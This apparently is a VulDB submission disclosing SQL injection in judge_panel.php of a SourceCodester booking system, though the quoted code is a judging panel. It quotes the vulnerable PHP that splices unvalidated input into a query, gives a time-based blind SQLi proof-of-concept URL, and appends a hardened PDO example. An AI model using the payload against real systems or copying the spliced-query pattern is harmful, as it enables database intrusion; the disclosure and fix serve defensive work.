Submission #71813: Online Flight Booking Management System judge_panel.php has SQLinject.

Title: Online Flight Booking Management System judge_panel.php has SQLinject.
Description:

    <?php
    error_reporting(0);
    include('header2.php');
    include('session.php');
    // All four values are taken from the query string without validation.
    $judge_ctr=$_GET['judge_ctr'];
    $subevent_id=$_GET['subevent_id'];
    $getContestant_id=$_GET['contestant_id'];
    $pageStat=$_GET['pStat'];
    ?>
    <?php
    // $subevent_id is interpolated directly into the SQL string.
    $event_query = $conn->query("select * from sub_event where subevent_id='$subevent_id'") or die(mysql_error());
    while ($event_row = $event_query->fetch()) { ?>
    <?php
    $se_MEidxx=$event_row['mainevent_id'];
    $se_namexx=$event_row['event_name'];
    $se_statusxx=$event_row['status'];
    ?>

Because the string entered by the user is not filtered and the SQL statements are spliced, the SQL injection vulnerability is generated. It can cause serious harm to the system.

PoC: http://127.0.0.1/judge_panel.php?judge_ctr=&subevent_id='and(select*from(select+sleep(2))a/**/union/**/select+1)='&contestant_id=
Source: https://github.com/qyhmsys/cve-list/blob/master/Online%20Flight%20Booking%20Management%20System%20judge_panel.md
User: wei.zhang (UID 38856)
Submitted: 2023. 01. 13. AM 07:45 (3 years ago)
Moderation: 2023. 01. 13. AM 10:18 (3 hours later)
Status: Accepted
VulDB entry: 218276 [SourceCodester Online Flight Booking Management System judge_panel.php subevent_id SQL injection]
Points: 20
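
A hardened form of the sub_event lookup quoted in the description, given here as an added example that is not part of the submission or of the SourceCodester code. Assumptions: subevent_id is a positive integer key, an in-memory SQLite table (constructed) stands in for the application's database, and fetchSubEvent is a hypothetical helper name.

```php
<?php
// Constructed stand-in for the application's database and sub_event table.
$conn = new PDO('sqlite::memory:');
$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$conn->exec("CREATE TABLE sub_event (
    subevent_id INTEGER PRIMARY KEY, mainevent_id INTEGER,
    event_name TEXT, status TEXT)");
$conn->exec("INSERT INTO sub_event VALUES (1, 10, 'Constructed event', 'activated')");

/**
 * Hypothetical helper: fetch one sub_event row by id, or null.
 * Assumes subevent_id is a positive integer key.
 */
function fetchSubEvent(PDO $conn, $rawId): ?array
{
    // 1. Validate: anything that is not a positive integer is refused
    //    before it gets near the database.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Bind: the SQL text is fixed; the value is sent as a typed parameter,
    //    so quotes in the input can never terminate the string literal.
    $stmt = $conn->prepare(
        'SELECT mainevent_id, event_name, status
           FROM sub_event WHERE subevent_id = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a legitimate id, and the subevent_id value as written
// in the report's PoC URL.
$inputs = ['1', "'and(select*from(select+sleep(2))a/**/union/**/select+1)='"];
foreach ($inputs as $in) {
    $row = fetchSubEvent($conn, $in);
    echo ($row ? "found: {$row['event_name']}" : "rejected or not found"), PHP_EOL;
}
```

The other `$_GET` values read at the top of judge_panel.php (`judge_ctr`, `contestant_id`, `pStat`) need the same treatment wherever they reach a query.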
